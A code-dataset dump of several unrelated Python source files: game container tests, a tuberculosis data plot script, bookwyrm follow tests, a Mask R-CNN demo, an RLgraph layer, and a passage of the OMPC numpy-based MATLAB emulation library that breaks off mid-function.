"""Test that addings a string instead of an array-like throws."""
with pytest.raises(TypeError):
container.add(player, "player")
@pytest.mark.parametrize("player, container", players_and_containers())
def test_remove_methods(container, player, enemies):
container.add(player, ["test"])
container.add(enemies[0], ["test"])
container.add(enemies[1], ["blue"])
assert player in container
assert enemies[0] in container
assert enemies[1] in container
container.remove(player)
assert player not in container
for kind in container.kinds():
assert player not in container.get(kind=kind)
for tag in container.tags():
assert player not in container.get(tag=tag)
assert enemies[0] in container
assert enemies[0] in container.get(tag="test")
assert enemies[1] in container
@pytest.mark.parametrize("player", players())
def test_collection_methods(player, enemies):
container = Children()
container.add(player)
container.add(enemies[0])
# Test __len__
assert len(container) == 2
# Test __contains__
assert player in container
assert enemies[1] not in container
# Test __iter__
for game_object in container:
assert game_object is player or game_object is enemies[0]
|
StarcoderdataPython
|
191758
|
<reponame>eva-koester/tuberculosis
import pandas as pd
import cleaning
import matplotlib.pyplot as plt
import seaborn as sns
df = cleaning.load_clean_data()
df['age'] = df['age'].replace([1], 14)
#print(df)
# sum of value per age
age = df.groupby('age')['value'].sum()
age=pd.DataFrame(age)
age=age.reset_index()
print(age)
print(age.info())
# sum of value per gender and age
age_gen = df.groupby(['gender', 'age'])['value'].sum()
age_gen=pd.DataFrame(age_gen)
age_gen = age_gen.reset_index()
print(age_gen.info())
print(age_gen)
## sum of value per gender, age, and country
age_cou = df.groupby(['age', 'country'])['value'].sum()
age_cou=pd.DataFrame(age_cou, index=None)
age_cou = age_cou.reset_index()
age_cou=age_cou.sort_values('value', ascending=False)
print(age_cou)
print(age_cou.iloc[0:2, 1])
# IN and CN have max tb values (at some age level)
IN_CN = age_cou[(age_cou['country'] == 'IN') | (age_cou['country'] == 'CN')]
print(IN_CN)
# plot age and age_gen
ax = plt.subplot(3, 1, 1)
g=sns.lineplot(x='age', y='value', data=age, ax=ax)
g.set(xlabel='age', ylabel='tuberculosis')
plt.title('tb per age')
ax = plt.subplot(3, 1, 2)
f=sns.lineplot(x='age', y='value', hue='gender', data=age_gen, ax=ax)
plt.title('tb per age and gender')
f.set(xlabel='age', ylabel='tuberculosis')
plt.tight_layout()
ax = plt.subplot(3, 1, 3)
g=sns.lineplot(x='age', y='value', hue='country', data=IN_CN, ax=ax)
g.set(xlabel='age', ylabel='tuberculosis')
plt.title('tb per age of max tb countries')
plt.show()
|
StarcoderdataPython
|
3263540
|
<gh_stars>0
from unittest.mock import patch
from django.test import TestCase
from bookwyrm import models, incoming
class IncomingFollow(TestCase):
def setUp(self):
with patch('bookwyrm.models.user.set_remote_server.delay'):
with patch('bookwyrm.models.user.get_remote_reviews.delay'):
self.remote_user = models.User.objects.create_user(
'rat', '<EMAIL>', 'ratword',
local=False,
remote_id='https://example.com/users/rat',
inbox='https://example.com/users/rat/inbox',
outbox='https://example.com/users/rat/outbox',
)
self.local_user = models.User.objects.create_user(
'mouse', '<EMAIL>', 'mouseword', local=True)
self.local_user.remote_id = 'http://local.com/user/mouse'
self.local_user.save()
def test_handle_follow(self):
activity = {
"@context": "https://www.w3.org/ns/activitystreams",
"id": "https://example.com/users/rat/follows/123",
"type": "Follow",
"actor": "https://example.com/users/rat",
"object": "http://local.com/user/mouse"
}
with patch('bookwyrm.broadcast.broadcast_task.delay') as _:
incoming.handle_follow(activity)
# notification created
notification = models.Notification.objects.get()
self.assertEqual(notification.user, self.local_user)
self.assertEqual(notification.notification_type, 'FOLLOW')
# the request should have been deleted
requests = models.UserFollowRequest.objects.all()
self.assertEqual(list(requests), [])
# the follow relationship should exist
follow = models.UserFollows.objects.get(user_object=self.local_user)
self.assertEqual(follow.user_subject, self.remote_user)
def test_handle_follow_manually_approved(self):
activity = {
"@context": "https://www.w3.org/ns/activitystreams",
"id": "https://example.com/users/rat/follows/123",
"type": "Follow",
"actor": "https://example.com/users/rat",
"object": "http://local.com/user/mouse"
}
self.local_user.manually_approves_followers = True
self.local_user.save()
with patch('bookwyrm.broadcast.broadcast_task.delay') as _:
incoming.handle_follow(activity)
# notification created
notification = models.Notification.objects.get()
self.assertEqual(notification.user, self.local_user)
self.assertEqual(notification.notification_type, 'FOLLOW_REQUEST')
# the request should exist
request = models.UserFollowRequest.objects.get()
self.assertEqual(request.user_subject, self.remote_user)
self.assertEqual(request.user_object, self.local_user)
# the follow relationship should not exist
follow = models.UserFollows.objects.all()
self.assertEqual(list(follow), [])
|
StarcoderdataPython
|
3417435
|
from unittest import TestCase
from icon_microsoft_teams.connection import Connection
import json
import logging
class TestConnection(TestCase):
def test_connection(self):
log = logging.getLogger("Test")
test_conn = Connection()
test_conn.logger = log
with open("../tests/send_message.json") as file:
data = json.load(file)
connection_params = data.get("body").get("connection")
test_conn.connect(connection_params)
self.assertIsNotNone(test_conn.api_token)
|
StarcoderdataPython
|
331458
|
<gh_stars>1-10
# coding: utf-8
# # Mask R-CNN Demo
#
# A quick intro to using the pre-trained model to detect and segment objects.
# In[1]:
import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
# Import COCO config
sys.path.append(os.path.join(ROOT_DIR, "samples/container/")) # To find local version
import container
#get_ipython().run_line_magic('matplotlib', 'inline')
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "logs/container20200717T1153/mask_rcnn_container_0030.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
# Directory of images to run detection on
IMAGE_DIR = os.path.join(ROOT_DIR, "samples/container/dataset/val")
# ## Configurations
#
# We'll be using a model trained on the MS-COCO dataset. The configurations of this model are in the ```CocoConfig``` class in ```coco.py```.
#
# For inferencing, modify the configurations a bit to fit the task. To do so, sub-class the ```CocoConfig``` class and override the attributes you need to change.
# In[2]:
class InferenceConfig(container.ContainerConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# ## Create Model and Load Trained Weights
# In[3]:
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# ## Class Names
#
# The model classifies objects and returns class IDs, which are integer value that identify each class. Some datasets assign integer values to their classes and some don't. For example, in the MS-COCO dataset, the 'person' class is 1 and 'teddy bear' is 88. The IDs are often sequential, but not always. The COCO dataset, for example, has classes associated with class IDs 70 and 72, but not 71.
#
# To improve consistency, and to support training on data from multiple sources at the same time, our ```Dataset``` class assigns it's own sequential integer IDs to each class. For example, if you load the COCO dataset using our ```Dataset``` class, the 'person' class would get class ID = 1 (just like COCO) and the 'teddy bear' class is 78 (different from COCO). Keep that in mind when mapping class IDs to class names.
#
# To get the list of class names, you'd load the dataset and then use the ```class_names``` property like this.
# ```
# # Load COCO dataset
# dataset = coco.CocoDataset()
# dataset.load_coco(COCO_DIR, "train")
# dataset.prepare()
#
# # Print class names
# print(dataset.class_names)
# ```
#
# We don't want to require you to download the COCO dataset just to run this demo, so we're including the list of class names below. The index of the class name in the list represent its ID (first class is 0, second is 1, third is 2, ...etc.)
# In[4]:
# COCO Class names
# Index of the class in the list is its ID. For example, to get ID of
# the teddy bear class, use: class_names.index('teddy bear')
class_names = ['BG','Cola Bottle','Fanta Bottle','Cherry Coke Bottle','Coke Zero Bottle','Mtn Dew Bottle','Cola Can','Fanta Can']
# ## Run Object Detection
# In[5]:
# Load a random image from the images folder
##file_names = next(os.walk(IMAGE_DIR))[2]
##image = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))
test_image = skimage.io.imread(os.path.join(IMAGE_DIR,'Image0170.png'))
test_image = image[:,:,:3]
# Run detection
results = model.detect([test_image], verbose=1)
# Visualize results
r = results[0]
visualize.display_instances(test_image, r['rois'], r['masks'], r['class_ids'],
class_names, r['scores'])
# Evaluation
# Compute VOC-Style mAP @ IoU=0.5
# Running on 40 images. Increase for better accuracy.
from container import ContainerDataset
dataset_val = ContainerDataset()
dataset_val.load_container(os.path.join(ROOT_DIR, "samples/container/dataset"), "val")
dataset_val.prepare()
image_ids = np.random.choice(dataset_val.image_ids, 40)
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(dataset_val, config, image_id, use_mini_mask=False)
image = image[:,:,:3]
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps = utils.compute_ap(gt_bbox, gt_class_id, gt_mask, r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
|
StarcoderdataPython
|
11226261
|
<reponame>samialabed/rlgraph
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.components.layers.preprocessing import PreprocessLayer
from rlgraph.utils.decorators import rlgraph_api
if get_backend() == "tf":
import tensorflow as tf
class RankReinterpreter(PreprocessLayer):
"""
Re-interprets the given ranks (ints) into batch and/or time ranks.
"""
def __init__(self, batch_rank=None, time_rank=None, scope="rank-reinterpreter", **kwargs):
"""
Args:
min\_ (float): The min value that any value in the input can have.
max\_ (float): The max value that any value in the input can have.
"""
super(RankReinterpreter, self).__init__(space_agnostic=True, scope=scope, **kwargs)
self.batch_rank = batch_rank
self.time_rank = time_rank
@rlgraph_api
def _graph_fn_apply(self, preprocessing_inputs):
if get_backend() == "tf":
ret = tf.identity(preprocessing_inputs, name="rank-reinterpreted")
# We have to re-interpret the batch rank.
if self.batch_rank is not None:
ret._batch_rank = self.batch_rank
# We have to re-interpret the time rank.
if self.time_rank is not None:
ret._time_rank = self.time_rank
return ret
|
StarcoderdataPython
|
9719689
|
<filename>ompclib/ompclib_numpy.py
# This file is a part of OMPC (http://ompc.juricap.com/)
#
# for testing:
# import ompclib_numpy; reload(ompclib_numpy); from ompclib_numpy import *
# TODO
# - remove all references to array, use "ompc_base._init_data" instead
import sys, os; sys.path.append(os.path.abspath('..'))
from itertools import izip as _izip, cycle as _cycle, repeat as _repeat
from ompc import _get_narginout
import os, sys
import numpy as np
import pylab as mpl
# Functions that are to be exported have to be listed in the __ompc_all__
# array.
# This decorator adds a function to the "toolbox-less" OMPC base library.
__ompc_all__ = ['end', 'mslice', 'mstring', 'OMPCSEMI',
'OMPCException', 'elmul', 'elpow', 'eldiv', 'ldiv', 'elldiv']
def _ompc_base(func):
global __ompc_all__
__ompc_all__ += [ func.__name__ ]
return func
OMPCSEMI = Ellipsis
OMPCEND = None
end = OMPCEND
_dtype2numpy = {'complex': 'complex128',
'double': 'f8', 'single': 'f4',
'int32': 'i4', 'uint32': 'u4',
'int16': 'i2', 'uint16': 'u2',
'int8': 'i1', 'uint8': 'u1',
'char': 'u1',
'bool': 'bool',
}
_numpy2dtype = {}
for k, v in _dtype2numpy.items():
_numpy2dtype[np.dtype(v)] = k
_numpy2dtype[str(np.dtype(v))] = k
_numpy2dtype[v] = k
# errors and warnings
class OMPCException(Exception):
def __init__(self,msg):
self.msg = msg
def __str__(self):
return repr(self.msg)
@_ompc_base
def error(x):
raise OMPCException(x)
class mvar(object):
@staticmethod
def _DataObject(dtype, data):
return np.array(data, dtype=_dtype2numpy[dtype])
def __new__(cls, *args, **kwargs):
a = super(mvar, cls).__new__(cls, *args, **kwargs)
a._a = None
a.dtype = 'double'
a.msize = (0, 0)
return a
def _init_data(self, dtype, msize, data):
self.dtype = dtype
self.msize = msize
self._a = self._DataObject(dtype, data)
def __call__(self, *i):
mview = self.__getitem1__(i)
mview.__ompc_view__ = _mview(self, i, False)
return mview
def _ctypes_get(self):
return self._a.ctypes
ctypes = property(_ctypes_get, None, None,
"Ctypes-wrapped data object.")
def _lvalue_set(self, val):
assert hasattr(self, '__ompc_view__')
o = self.__ompc_view__
# FIXME: o.linear
o.viewed.__setitem1__(o.ins, val)
lvalue = property(None, _lvalue_set, None, "")
def __copy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __base0__(self, shp=None):
raise OMPCException(
'Class "%s" cannot be used as index!'%self.__class__)
# FIXME: warn people about using numpy functions directly
def __array__(self):
print 'in __array__', repr(self)
print 'in __array__', self
raise NotImplementedError("At the moment using numpy functions " \
"directly is not possible! Please read the documentation at " \
"http://ompc.juricap.com/documentation/.")
def __nonzero__(self):
return bool(np.any(self._a != 0))
class _mview(mvar):
def __init__(self, viewed, ins, linear):
self.viewed = viewed
self.ins = ins
self.linear = linear
def __repr__(self):
return "_mview(%r, %r, %r)"%(self.viewed, self.ins, self.linear)
def __str__(self):
return "<view of %r>"%(self.viewed)
def _dsize(dtype):
return _dsize_dict[dtype]
def _flatten(seq):
for item in seq:
if _isscalar(item) and not hasattr(item, '__len__'):
yield item
else:
for subitem in _flatten(item):
yield subitem
def _ndi(*i):
"""Returns a generator of tuples that iterate over elements specified
by slices and indices in `i`."""
from itertools import chain, repeat, cycle, izip
r = lambda x: range(x.start, x.stop, x.step is None and 1 or x.step)
res = []
for x in i:
if isinstance(x, slice): res.append(r(x))
elif _isscalar(x): res.append([x])
else: res.append(x)
i = res
cp = 1
gs = []
for x in i[:-1]:
gs += [ cycle(chain(*(repeat(j,cp) for j in x))) ]
cp *= len(x)
gs += [ chain(*(repeat(j,cp) for j in i[-1])) ]
return izip(*gs)
def _isscalar(A):
if isinstance(A, str):
return False
elif hasattr(A, '__len__') and len(A) > 1:
return False
elif hasattr(A, '__getitem__'):
try: A[1]
except: return True
else: return False
elif hasattr(A, '__iter__'):
return False
# doesn't have length nor multiple elements and doesn't support iteration
return True
def _typegreater_(Adt, Bdt):
"""Returns type with higher precision."""
if isinstance(Adt, _marray): Adt = Adt.dtype
if isinstance(Bdt, _marray): Bdt = Bdt.dtype
return _dsize_dict[Adt] >= _dsize_dict[Bdt] and Adt or Bdt
def _typegreater(Adt, Bdt):
"""Returns type with higher precision."""
return _dsize_dict[Adt] >= _dsize_dict[Bdt] and Adt or Bdt
def _dtype(X):
# from operator import isSequenceType
# while isSequenceType(X):
# X = X[0]
# res = tuple(reversed(shp))
# FIXME: return
if isinstance(X, str):
return 'char'
return 'double'
def _size(X, d=None):
if isinstance(X, _marray):
res = X.msize
elif _isscalar(X):
return (1, 1)
else:
from operator import isSequenceType
shp = []
while isSequenceType(X):
shp.append(len(X))
X = X[0]
res = tuple(reversed(shp))
# minimum shape is 2 dimensional
if len(res) == 1:
res = (1, res[0])
if d is None:
return res
else:
return res[d]
def _ndshape(msize, *i):
"""Determine the shape of a view on A with slicing specified in `i`.
"""
shp = []
for idim, x in enumerate(i):
if isinstance(x, slice):
start, stop, step = x.start, x.stop, x.step
if x.start is None: start = 0
if x.stop == sys.maxint or x.stop is None: stop = msize[idim]
if x.step is None: step = 1
shp.append( len(range(start,stop,step)) )
elif _isscalar(x):
shp.append(1)
elif hasattr(x, '__len__'):
shp.append(len(x))
else:
raise NotImplementedError()
if len(shp) == 1: shp[:0] = [1]
return shp
def _ndshape1(msize, *i):
"""Determine shape of a view on size msize with slicing specified in `i`.
"""
shp = []
for idim, x in enumerate(i):
if isinstance(x, _mslice):
if x.hasnoend():
shp.append( len(mslice[x.start:x.step:msize[idim]]) )
else:
shp.append( len(x) )
elif _isscalar(x):
shp.append(1)
elif hasattr(x, '__len__'):
shp.append(len(x))
else:
if isinstance(x, slice):
raise NotImplementedError()
shp.append(mrange(x))
else:
raise NotImplementedError()
#if len(shp) == 1: shp[:0] = [1]
if len(shp) == 1:
if msize[0] == 1: shp[:0] = [1]
else: shp.append(1)
return shp
@_ompc_base
def isempty(A):
return np.prod(A.msize) == 0
###################### base mfunctions
@_ompc_base
def plus(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A+B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def minus(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A-B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def uminus(A):
if isinstance(A, mvar): A = A._a
na = -A
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def times(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A*B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def mtimes(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
# the arrays are stored transposed
na = np.dot(B, A)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def power(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A**B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
try:
from numpy.linalg import matrix_power
except:
def matrix_power(M,n):
if len(M.shape) != 2 or M.shape[0] != M.shape[1]:
raise ValueError("input must be a square array")
if not issubdtype(type(n),int):
raise TypeError("exponent must be an integer")
from numpy.linalg import inv
if n==0:
M = M.copy()
M[:] = np.identity(M.shape[0])
return M
elif n<0:
M = inv(M)
n *= -1
result = M
if n <= 3:
for _ in range(n-1):
result = np.dot(result, M)
return result
# binary decomposition to reduce the number of Matrix
# multiplications for n > 3.
beta = np.binary_repr(n)
Z, q, t = M, 0, len(beta)
while beta[t-q-1] == '0':
Z = np.dot(Z,Z)
q += 1
result = Z
for k in range(q+1,t):
Z = np.dot(Z,Z)
if beta[t-k-1] == '1':
result = np.dot(result,Z)
return result
@_ompc_base
def mpower(A, B):
if len(A.msize) != 2:
raise OMPCException('??? Error using ==> mpower\n'
'marray must be 2-D')
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
if isinstance(B, float):
if np.around(him) != him: raise NotImplementedError()
else: B = int(B)
na = matrix_power(A.T, B)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
_solve = np.linalg.solve
@_ompc_base
def mldivide(A, B):
# FIXME A, B have to be matrices
if A.msize[0] == A.msize[1]:
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = _solve(A, B)
msize = na.shape[::-1]
if len(msize) == 1: msize = (msize[0], 1)
return _marray(_numpy2dtype(na.dtype), msize, na.T)
else:
raise NotImplementedError()
raise NotImplementedError()
@_ompc_base
def mrdivide(A, B):
"A/B = (B.T\A.T).T"
return mldivide(B.T, A.T).T
# raise NotImplementedError()
@_ompc_base
def ldivide(A, B):
return rdivide(B, A)
@_ompc_base
def rdivide(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A / B
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
@_ompc_base
def eq(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A == B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def ne(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A != B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def lt(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A < B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def gt(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A > B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def le(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A <= B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def ge(A, B):
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = A >= B
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def and_(A, B):
'''Element-wise logical AND.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_and(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def or_(A, B):
'''Element-wise logical OR.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_or(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def not_(A):
'''Logical NOT.'''
if isinstance(A, mvar): A = A._a
na = np.logical_not(A)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def xor_(A, B):
'''Logical XOR.'''
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
na = np.logical_xor(A, B)
return _marray('bool', na.shape[::-1], na)
@_ompc_base
def any(A):
'''True if any element of vector is nonzero'''
if isinstance(A, mvar): A = A._a
return bool(np.any(A))
@_ompc_base
def all(A):
'''True if all elements of vector is nonzero'''
if isinstance(A, mvar): A = A._a
return bool(np.all(A))
def transpose(A):
'''Transpose.'''
if len(A.msize) != 2:
raise OMPCException('Transpose on ND array is not defined.')
return _marray(A.dtype, A.msize[::-1], A._a.T.copy())
def ctranspose(A):
'''Complex conjugate transpose.'''
if len(A.msize) != 2:
raise OMPCException('Transpose on ND array is not defined.')
return _marray(A.dtype, A.msize[::-1], A._a.conj().T.copy())
def horzcat(*X):
'''Horizontal concatenation.'''
# our _a member is transposed do vertcat
X = [ isinstance(x, mvar) and x or x._a for x in X ]
na = np.vstack(X)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
def vertcat(*X):
'''Vertical concatenation.'''
# our _a member is transposed do horztcat
X = [ isinstance(x, mvar) and x or x._a for x in X ]
na = np.hstack(X)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
# FIXME bit operations
def union(A, B, flag=None):
'''Set union.'''
# FIXME support nargout = 3
if isinstance(A, mvar): A = A._a
if isinstance(B, mvar): B = B._a
if flag.lower() == 'rows':
if A.ndim != 2 or B.ndim != 2:
raise OMPCException('A nd B must 2D matrices!')
if A.shape[0] != B.shape[0]:
raise OMPCException('A nd B must have same number of columns!')
# FIXME: slow and memory hungry
sA = set( tuple(x) for x in A )
na = np.array([ x for x in sA.union( tuple(x) for x in b._a.T ) ]).T
else:
# must be vectors
if A.shape[0] == 1 or A.shape[1] == 1: A = A.reshape(-1)
else: raise OMPCException('A nd B must vectors or 2D matrices!')
if B.shape[0] == 1 or B.shape[1] == 1: B = B.reshape(-1)
else: raise OMPCException('A nd B must vectors or 2D matrices!')
na = np.union1d(A, B).reshape(-1,1)
return _marray(_numpy2dtype[na.dtype], na.shape[::-1], na)
def unique(A, B):
'''Set unique.'''
raise NotImplementedError()
def intersect(A, B):
'''Set intersection.'''
raise NotImplementedError()
def setdiff(A, B):
'''Set difference.'''
raise NotImplementedError()
def setxor(A, B):
'''Set exclusive-or.'''
raise NotImplementedError()
def ismember(A, B):
'''True for set member.'''
raise NotImplementedError()
############ operators
class _el(object):
def __new__(cls, left=None, right=None):
if left is None or right is None:
nel = super(_el, cls).__new__(_el)
nel.__class__ = cls
nel.left = left
nel.right = right
return nel
else:
return cls.op(left, right)
def make_operator(name, method):
class _op(_el):
op = staticmethod(method)
def op(self, right):
if self.left is None: return self.__class__(right=right)
return self.op(self.left, right)
def rop(self, left):
if self.right is None: return self.__class__(left=left)
return self.op(left, self.right)
_op.__name__ = '_el%s'%name
setattr(_op, '__%s__'%name, op)
setattr(_op, '__r%s__'%name, rop)
return _op()
elmul = make_operator('mul', times)
elpow = make_operator('pow', power)
eldiv = make_operator('div', rdivide)
ldiv = make_operator('div', mldivide)
elldiv = make_operator('div', ldivide)
############ support functions
def _squeeze(A):
res = A.__copy__()
res.msize = [ x for x in res.msize if x > 1 ]
return res
def _msize(*args):
if len(args) == 1 and hasattr(args, '__len__'):
args = args[0]
if len(args) > 2 and args[-1] == 1: args = args[:-1]
if len(args) == 1:
if construct: args = (args[0], args[0])
else: args = (args[0], 1)
return args
import __builtin__
def doublestr(x,prec=4):
try:
float(x)
except:
return x
else:
return '%6s'%__builtin__.round(x,4)
import __builtin__
def complexstr(x,prec=4):
try:
x = complex(x)
except:
return x
else:
return '%6s %s %6sj'%(__builtin__.round(x.real,4),
x.imag >= 0.0 and '+' or '-',
__builtin__.round(x.imag,4))
def print_marray(A, ans=True):
nstr = doublestr
if A.dtype == 'complex': nstr = complexstr
pre = ''
if ans:
pre = '\nans = \n'
if isempty(A):
pre += '\n []'
if len(A.msize) > 2:
for i in _ndi(*[slice(0,x) for x in A.msize[2:]]):
pre += '\n(:, :, %s)\n'%', '.join([str(x+1) for x in i])
cur = (slice(0,A.msize[0]), slice(0, A.msize[1])) + i
sA = A.__getitem__(cur)
sA.msize = A.msize[:2]
pre += print_marray(sA, False)
return pre
else:
#return str(A._a.T) + '\n\n'
M, N = A.msize
if N < 10: srow = lambda i: A._a[:,i]
else: srow = lambda i: list(A._a[[0, 1, 2],i]) + \
['...'] + \
list(A._a[[N-3, N-2, N-1], i])
if M < 10: rows = ( srow(i) for i in xrange(M) )
else: rows = [ srow(i) for i in xrange(3) ] + \
[('...',)] + \
[ srow(i) for i in [M-3,M-2,M-1] ]
res = pre + '\n ' + \
'\n '.join(', '.join(map(nstr,x)) for x in rows)
if ans: res += '\n\n'
else: res += '\n'
return res
@_ompc_base
def disp(X):
if isinstance(X, _marray):
print print_marray(X, False)
if isinstance(X, str):
print X
else:
print X
class _marray(mvar):
@staticmethod
def empty(shp, dtype):
return _marray(dtype, shp)
@staticmethod
def zeros(shp, dtype):
na = _marray(dtype, shp)
na._a.flat[:] = 0 #np.zeros(na.msize[::-1], _dtype2numpy[dtype])
#na.msize = shp
return na
@staticmethod
def ones(shp, dtype):
na = _marray(dtype, shp)
na._a.flat[:] = 1 #np.ones(na.msize[::-1], _dtype2numpy[dtype])
#na.msize = shp
return na
def __init__(self, dtype, msize, a=None):
from operator import isSequenceType
if not isSequenceType(msize):
msize = (msize, msize)
elif len(msize) == 1:
msize = (msize[0], 1)
if a is None:
self._a = np.empty(msize[::-1], _dtype2numpy[dtype])
elif isinstance(a, np.ndarray):
self._a = a
else:
self._a = np.array(a, _dtype2numpy[dtype]).reshape(msize[::-1])
self.msize = msize
self.dtype = dtype
def __copy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
def __deepcopy__(self):
return _marray(self.dtype, self.msize, self._a.copy())
# operators
def __elpow__(self, him):
return power(self, him)
def __pow__(self, right):
# if multiplying with _el object, call the elementwise operation
if isinstance(right, _el): return right.__class__(self, right.right)
elif _isscalar(right): return power(self, right)
return mpower(self, right)
def __rpow__(self, left):
# if multiplying with _el object, call the elementwise operation
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return power(left, self)
return mpower(left, self)
def __elmul__(self, him):
return times(self, him)
def __mul__(self, right):
if isinstance(right, _el): return right.__class__(self, right.right)
elif _isscalar(right): return times(self, right)
return mtimes(self, right)
def __rmul__(self, left):
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return times(left, self)
return mtimes(left, self)
def __eldiv__(self, him):
return rdivide(self, him)
def __div__(self, right):
# if multiplying with _el object, call the elementwise operation
if isinstance(right, _el): right.__class__(self, right.right)
elif _isscalar(right): return rdivide(self, right)
return mrdivide(self, right)
def __rdiv__(self, left):
# if multiplying with _el object, call the elementwise operation
if isinstance(left, _el): return left.__class__(left.left, self)
elif _isscalar(left): return rdivide(left, self)
return mrdivide(left, self)
def __add__(self, him): return plus(self, him)
def __radd__(self, him): return plus(him, self)
def __sub__(self, him): return minus(self, him)
def __rsub__(self, him): return minus(him, self)
def __neg__(self): return uminus(self)
# comparisons
def __ge__(self, other): return ge(self, other)
def __gt__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a > other)
def __le__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a <= other)
def __lt__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a < other)
def __eq__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a == other)
def __ne__(self, other):
if isinstance(other, _marray): other = other._a
return _marray('bool', self.msize, self._a != other)
# element access
def __iter__(self):
#return (_marray(self.dtype, (1,1), x) for x in self._a.flat )
#return iter(self._a.flat)#(_marray(self.dtype, (1,1), x) for x in self._a.flat )
return ( float(x) for x in self._a.flat )
#(_marray(self.dtype, (1,1), x) for x in self._a.flat )
def __len__(self):
return max(self.msize)
def __base0__(self, shp=None):
# FIXME: issue a warning on non-integers
if self.dtype == 'bool':
return self._a
ind = (self._a - 1).T.astype('i4')
if ind.ndim == 2 and ind.shape[0] == 1 or ind.shape[1] == 1:
ind = ind.reshape(-1)
# if ind.ndim == 2 and ind.shape[0] == 1:
# ind = ind[0]
return ind
def __getitem__(self, i):
# determine the size of the new array
if not hasattr(i, '__len__'): i = [i]
nshp = _ndshape(self.msize, *i)
#return _marray(self.dtype, nshp, self._a.__getitem__(reversed(i)))
return _marray(self.dtype, nshp, self._a.__getitem__(i[::-1]))
# >> a = reshape(1:15,5,3)
# >> a(eye(3)==1)
# ans = [1, 5, 9]
def __getitem1__(self, i):
# determine the size of the new array
#if not hasattr(i, '__len__'): i = [i]
nshp = _ndshape1(self.msize, *i)
ri = []
